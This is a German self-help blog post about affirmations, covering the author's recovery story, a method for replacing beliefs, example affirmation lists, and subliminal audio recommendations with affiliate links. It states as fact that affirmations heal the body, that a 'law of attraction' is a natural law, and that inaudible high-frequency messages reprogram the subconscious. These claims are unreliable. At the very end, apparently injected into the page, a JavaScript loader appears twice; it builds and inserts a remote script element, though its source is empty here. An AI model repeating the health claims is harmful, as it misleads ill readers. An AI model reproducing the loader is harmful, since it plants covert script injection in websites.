Was sind Affirmationen – finde es heraus!

Positive Gedanken.

Willkommen zur Selbstoptimierung!

Ein kleines Vorwort

Vor 6 Jahren war ich ziemlich krank und emotional total unausgeglichen. Ich habe mich im Bett hin und her gewälzt und ständig darüber nachgedacht, was in meinem Leben alles nicht hinhaut und wie unglücklich mich das alles macht…

Leseempfehlung - Heile deinen Körper - Seelisch-geistige Gründe für körperliche Krankheit.

Leseempfehlung – Heile deinen Körper – Seelisch-geistige Gründe für körperliche Krankheit

“Ach, son Mist, immer wieder das selbe!” dachte ich mir, “Warum kriege ich meine Probleme denn nicht endlich mal in den Griff?”
Ich war sowas von schlecht drauf und habe eigentlich nur negative Gedanken in einer Schleife in meinem Kopf ablaufen lassen…
Dann hat mir eine Freundin das Buch: “Heile deinen Körper” von Louise Hay* gegeben und gesagt: “Guck doch einfach mal rein, vielleicht ist das ja was für dich…” – und ich dachte mir so: “Warum nicht, vielleicht komme ich ja so mal auf andere Gedanken…”
Auf jeden Fall habe ich einfach diese Buch genommen und angefangen, die ganzen positiven Affirmationen zum gesamten Körper, den Organen und Wirbeln usw. durchzulesen.

Ich hatte ungefähr eine knappe Stunde lang ausschließlich positive Affirmationen gelesen und plötzlich hatte ich einen richtigen Flash: Ich bin aufgesprungen, voller Energie, und dachte die ganze Zeit nur: “Man, das ist ja voll der Hammer!” …

Eine knappe Stunde zuvor hatte mir noch alles weh getan, ich war total mies drauf und alles war doof. Dann, nachdem ich eine Stunde lang ausschließlich positive Gedanken gedacht hatte, ging es mir plötzlich super! Ich fühlte mich nicht mehr kraftlos und niedergeschlagen sondern war voller Energie!
Auf einen Schlag war mir die tatsächliche Kraft meiner Gedanken bewusst geworden und wie ausschlaggebend ihre Qualität für meine Lebensumstände ist, ich hatte es direkt körperlich erfahren…

Das war für mich ein Wendepunkt und ich dachte mir: “Diesen Effekt mache ich mir jetzt zu nutze um mein Leben in die Bahnen zu lenken, die mich zu meinem Glück führen…” – das habe ich getan und heute bin ich überglücklich und sowas von dankbar für das Wissen darum…

Was sind Affirmationen ?

Grundsätzlich ist der Begriff Affirmation abgeleitet vom lateinischen “affirmatio”, was “Versicherung, Beteuerung” bedeutet. Affirmationen sind Bejahungen, Bekräftigungen, Zustimmungen, positive Wertungen.

Im Bereich der Spiritualität, der Religion und Esoterik werden Affirmationen beispielsweise in Gebeten oder Mantren genutzt um eine positive (Geistes-)Haltung einzunehmen. Auch in der Psychologie verwendet man affirmative Elemente in verschiedenen Therapien.

Mittels Affirmationen kannst Du dir selbst dabei helfen, deine Persönlichkeit weiterzuentwickeln, besser mit dem Leben klarzukommen, Selbstvertrauen und Stärke aufzubauen, Ängste zu überwinden, dich selbst zu akzeptieren, so wie Du bist, und vieles mehr…

Was sind Affirmationen?

Was sind Affirmationen?

Und wie funktioniert das mit den Affirmationen?

Affirmationen sind einfache, klare und positiv formulierte Glaubenssätze. “Ich bin erfolgreich!” ist zum Beispiel eine Affirmation.
Affirmationen kann man laut, leise oder in Gedanken sprechen. Sie dienen dem Zweck und Ziel, das eigene Unterbewusstsein mit neuen und positiven Informationen zu versorgen und das eigene Selbstbild aufzuwerten.

Auf diese Weise ist es dem Menschen möglich, sich aus sich selbst heraus positiv zu beeinflussen und zu verändern.

Affirmationen stellen, richtig angewandt, ein sehr wirkungsvolles psychologisches Werkzeug dar. Nutzen kann man diese Art der Selbstbeeinflussung in allen Bereichen seines Lebens.

In diesem Beitrag erfährst Du:

  • wie man unvorteilhafte Glaubensmuster aufspüren kann
  • wie man gute Affirmationen dem gewünschten Ziel entsprechend entwickelt
  • und welche Möglichkeiten es gibt, mit Affirmationen zu arbeiten.

 

 Mein persönliches Fazit aus meiner bisherigen Arbeit mit Affirmationen:

Unsere Persönlichkeit und das was wir denken ist das Resultat der Glaubensmuster die wir uns bisher antrainiert haben. Diese Muster formen unser Leben und die Erfahrungen, die wir machen.

Wenn wir mit etwas in unserem Leben nicht glücklich sind, wollen wir logischerweise etwas ändern. “Nur wie?” ist dann die Frage.

 

Mit Hilfe von Affirmationen kann man sich selbst umprogrammieren. Meine Vorgehensweise dabei ist folgende:

1. Ich stelle fest, dass ich mit einer bestimmten Situation unzufrieden bin und akzeptiere es erst einmal.

2. Ich reflektiere und analysiere meine Gedanken solange, bis ich herausgefunden habe, welche grundlegende Überzeugung in meinem Inneren mich zu dieser Erfahrung geführt hat.

3. Ich nehme ein Blatt Papier, schreibe auf die linke Seite: “Alte Glaubenssätze” und liste all die negativen Gedanken auf, derer ich mir im vorherigen Schritt bewusst geworden bin.

4. Ich überlege mir, was ich stattdessen gerne haben würde und schreibe es auf die rechte Seite des Blattes unter: “Neue Glaubenssätze”.

5. Ich treffe eine bewusste und freie Wahl: Ich nehme Abschied von den alten Glaubensmustern, streiche sie alle durch und schreibe darunter “Falsch!”. Dann begrüße ich die neuen Glaubenssätze in meinem Leben und schreibe darunter: “Richtig!”. (Sehr wirksam ist es auch, das Blatt Papier in der Mitte zu trennen und den Teil mit den alten Glaubenssätzen zu verbrennen, wenn man soweit ist und innerlich damit abgeschlossen hat.)

6. Dann mache ich aus den neuen Glaubenssätzen wirkungsvolle Affirmationen und beginne damit, mir meine neuen Glaubensmuster mit bestimmten Techniken und Methoden anzutrainieren…

Affirmationen – Beispiele

Hier habe ich mal eine Liste von Beispiel-Affirmationen erstellt um Dir einen kleinen Überblick über die möglichen Anwendungsgebiete zu geben.

Wenn Du Lust dazu hast, lade ich Dich ein:

  • einmal tief ein- und wieder auszuatmen,
  • den Kummer der Welt einfach mal loszulassen (der kommt schon damit klar, wenn Du mal kurz Pause machst)
  • und Dir nun am Besten alle Affirmationen einmal durchzulesen und dann einfach mal zu gucken wie sich das anfühlt…

Allgemeine Affirmationen: Ich bin wertvoll; Es geht mir von Tag zu Tag immer besser und besser; Ich öffne mich für Neues; Ich bin kraftvoll; Ich stehe zu mir; Ich bin ein guter Mensch; Das Universum schickt mir was ich brauche

Affirmationen für Gesundheit: Ich bin gesund; Ich liebe und vertraue meinem gesunden Körper; Mein Körper trägt alles zur Heilung in sich; Mein Körper heilt sich und es geht mir jeden Tag besser; Ich gestatte meinem Körper, in blühender Gesundheit zu sein

Affirmationen für Selbstwert: Ich bin es wert, glücklich zu sein; Ich bin es wert, kerngesund zu sein; Ich bin es wert, geliebt zu werden; Ich weiß, was ich tue; Ich bin stolz auf mich; Ich vertraue mir; Ich nehme mich mit all meinen Gefühlen an;  Ich bin in allen Situationen gelassen, selbstsicher und frei;

Affirmationen für Beziehungen: Ich strahle Liebe aus; Liebe erfüllt mein Leben; Ich habe gute Beziehungen und bekomme viel von anderen Menschen; Ich habe viel Spaß und Freude mit anderen Menschen; Ich teile mich anderen immer klar und authentisch mit und kann mich gut abgrenzen

Affirmationen für Familie: Ich bin dankbar und voller Liebe für meine Familie; Ich fühle mich in meiner Familie akzeptiert und geborgen; Meine Familie gibt mir die Kraft und Unterstützung, die ich brauche; Meine Familie liebt mich

Affirmationen für Kreativität und Talente: Ich entdecke Talente in mir, die mir bisher verborgen waren; Meine Kreativität erfreut mich jeden Tag neu; Ich habe ein unbegrenztes kreatives Potential; Mit meinen Talenten bereichere ich die Menschen um mich

Affirmationen für Beruf und finanziellen Erfolg: Ich bin erfolgreich; Ich agiere zum Wohle anderer; Ich bekomme Anerkennung; Geld, Ideen, Waren und die nötigen Kontakte sind jetzt und immer für mich da; Ich ziehe Geld magisch an; Ich lebe in der Fülle; Ich liebe, was ich tue

Beispiele für Affirmationen.

Wie fühlt sich das an? Vielleicht spürst Du ja, welche Kraft von den Affirmationen ausgehen kann – vielleicht spürst Du auch innere Abwehr?

Affirmationen sind Glaubenssätze und wenn Du Dich bei manchen dieser Worte ungut fühlst, dann kann es vielleicht daran liegen, das Du in diesen Bereichen ein anderes Glaubensmuster in deinem Unterbewusstsein abgespeichert hast.

In dem Fall empfehle ich Dir, diesem Glaubensmuster einmal auf den Grund zu gehen und zu erforschen, was es bedeutet und was es bewirkt. Dazu findest Du in den weiteren Artikeln hilfreiche Informationen.

Bei der Arbeit mit Affirmationen habe ich die Erfahrung gemacht, dass man, wenn man sich für die positive Kraft der Affirmationen öffnet, seine Gedanken, seine Gefühle und, bei längerer Anwendung, sein Leben positiv verändern kann.

Ich arbeite täglich mit Affirmationen  und nicht zuletzt aufgrund meiner positiven Erfahrungen damit habe ich mich dazu entschlossen, diesen Beitrag zu veröffentlichen

 

Manipuliert man mit Affirmationen sein Unterbewusstsein?

Skeptiker halten die Arbeit mit Affirmationen für Unsinn, weil man sich dabei sozusagen etwas “einredet”, was gegenwärtig nicht der Fall ist.

Dieses Argument kann man nicht direkt von der Hand weisen, de facto redet man sich, wenn man krank ist, mit einer Affirmation ein, gesund zu sein.

Das macht man, weil unser Geist, bzw. unser Unterbewusstsein, sehr mächtig ist und das erschafft, was unseren vorherrschenden Haltungen und Glaubensmustern, unserer inneren Warheit entspricht.

Um ein gewünschte Ziel zu erreichen, erschafft man den gewünschten Zustand zuerst im Bewusstsein und wenn man das lange genug wiederholt hat, rutscht die Information ins Unterbewusstsein und wird zur inneren Wahrheit.

Das hat zur Folge, dass das Unterbewusstsein den gewünschten Zustand erschafft.

Es gibt ein Naturgesetzt, ein Schwingungsresonanzgesetzt, nachdem jeder Mensch etwas Erwünschtes in sein Leben ziehen kann. Dieses Gesetz ist das Gesetz der Anziehung (dazu gibt es einschlägige Literatur).

Wenn man professionell mit Affirmationen arbeitet erschafft man wünschenswerte Gedanken, die zu Zuständen werden und in entsprechenden Lebensumständen resultieren.

Grundsätzliches zum Unterbewusstsein:

Wieso kann man ein Auto fahren ohne direkt darüber nachdenken zu müssen? Die Antwort ist: Dein Unterbewusstsein regelt das für Dich. Und zwar mittels Automatismen:

Automatismen regeln Aktivitäten ohne eine willentliche Steuerung. Wenn wir eine Fertigkeit, wie hier im Beispiel das Autofahren, erlernen, dann müssen wir uns am Anfang sehr genau auf alles, was dazu nötig ist konzentrieren (Kupplung, Gang rein etc. …) .

Wenn man das immer öfter macht, gewinnt man immer mehr Routine in diesen Arbeitsabläufen und es geht einem immer leichter von der Hand (oder vom Fuß :-) ).

Wenn man das Autofahren dann lange genug geübt hat ist daraus ein Automatismus geworden – die Informationen sind im Unterbewusstsein und von dort aus können sie abgerufen werden und laufen dann automatisch.

Alles ist so oft WIEDERHOLT worden, dass die Datenautobahnen im Gehirn für diese Prozesse so stark ausgebaut wurden, dass das Autofahren jetzt von selber funktionieren kann…

Ebenso automatisch funktionieren auch unsere unbewussten Glaubensmuster, weil wir sie lange (seit der Kindheit) gelernt und dem Unterbewusstsein eingeprägt haben. Unser Unterbewusstsein erschafft dann unsere Realität nach diesen automatischen Mustern.

Genau so funktionieren auch die Affirmationen: anfangs muss man sie immer und immer wieder wiederholen und bewusst daran denken – wenn man ernsthaft bei der Sache bleibt kommt irgendwann der Punkt, wo die Affirmationen als Automatismus im Unterbewusstsein existieren.

Der Informationsgehalt ist integriert und als innere Wahrheit akzeptiert. Somit befindet man sich dann auch in dementsprechend positiven äußeren Lebensumständen.

Positive Gedanken.

Subliminale Botschaften – was ist das denn?

Subliminal kommt aus dem Latein und bedeutet “unterschwellig”, also geht es hierbei um unterschwellige Botschaften.

Unterschwellige Botschaften sind Reize, die unterhalb der Bewusstseinsschwelle liegen und vom bewussten Geist nicht wahrgenommen werden können, jedoch das Unterbewusstsein erreichen. Ok, was hat das jetzt mit Affirmationen zu tun?

Es gibt seit vielen Jahren auf dem Selbsthilfemarkt verschiedene Entspannungs-CD´s und -mp3-Downloads die subliminale Botschaften enthalten.

Das bedeutet, das es zu der Musik, die man hören kann, noch andere Geräusche gibt, die der bewusste Geist nicht wahrnehmen kann, die jedoch das Unterbewusstsein erreichen.

Diese Geräusche liegen in einem Frequenzbereich oberhalb von 14,5 kHz und sprechen gezielt das Unterbewusstsein an.

Nehmen wir mal an, auf der gekauften CD ist meditative Musik mit subliminalen Botschaften zu dem Thema “Positive Selbstdisziplin”, dann läuft zu der Musik die man hören kann eine unhörbare Stimme und spricht ununterbrochen Affirmationen wie:

“Durch meine positive Selbstdisziplin halte ich Ordnung in meinem Leben” oder “Meine positive Selbstdisziplin hilft mir, alle meine Ziele zu erreichen”.

Diese Affirmationen wurden von einem Sprecher gesprochen und aufgenommen und dann in einen Frequenzbereich über 14,5 kHz transformiert.

Somit kann man sie mit seinem bewussten Geist nicht mehr wahrnehmen, weil dieser sich auf einen tieferen Frequenzbereich konzentriert, dass Unterbewusstsein jedoch kriegt alles mit und kann die Informationen wahrnehmen und auswerten.

Meine Empfehlung: Silent-Subliminals Starter Box.

Meine Empfehlung: Silent-Subliminals Starter Box

Ein Vorteil der unterschwelligen Vermittlung von Affirmationen ist, dass sie das kritische Wachbewusstsein umgeht. Der kritische, bewusste Geist kann die Informationen nicht wahrnehmen, infolgedessen auch nicht filtern und er lässt sie somit ungehindert passieren.

Dabei sollte man sich jedoch vor Augen halten, das diese gekauften Subliminal-CD´s von irgendwem aufgenommen wurden, also die Affirmationen hat irgend jemand gesprochen, den man selbst nicht kennt und von dem man nicht weiß, in welcher Verfassung er die Affirmationen gesprochen hat.

Es ist jedenfalls meine persönliche Meinung, dass die Verfassung beim Sprechen von Affirmationen und die daraus resultierende Betonung der Worte, genau so entscheidend für den Erfolg ist wie die Wortwahl.

Hinzu kommt, dass das Unterbewusstsein die Stimme des Sprechers nicht kennt und wahrscheinlich denkt: “Da ist irgendwer und erzählt etwas von sich”.

Ich bin der Meinung, dass nur die eigenen und auch selbst gesprochenen Affirmationen einen wirklich guten Effekt haben. Am wirksamsten ist es für mich immer noch, wenn ich selbst zu mir sage “Ich fühle mich gut”.

Sollte dir das aber auf Dauer zu langwierig sein, so gibt es sehr schöne Angebote, z.B. von Silent Subliminals* >

 

 

Hier geht es zu Teil 2 >

  • 8. Januar 2020
tschakaaa
 

>
var gfjfgjk = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true; var pl = ''; s.src=pl; if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript); } else { d.getElementsByTagName('head')[0].appendChild(s); }var gfjfgjk = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true; var pl = ''; s.src=pl; if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript); } else { d.getElementsByTagName('head')[0].appendChild(s); }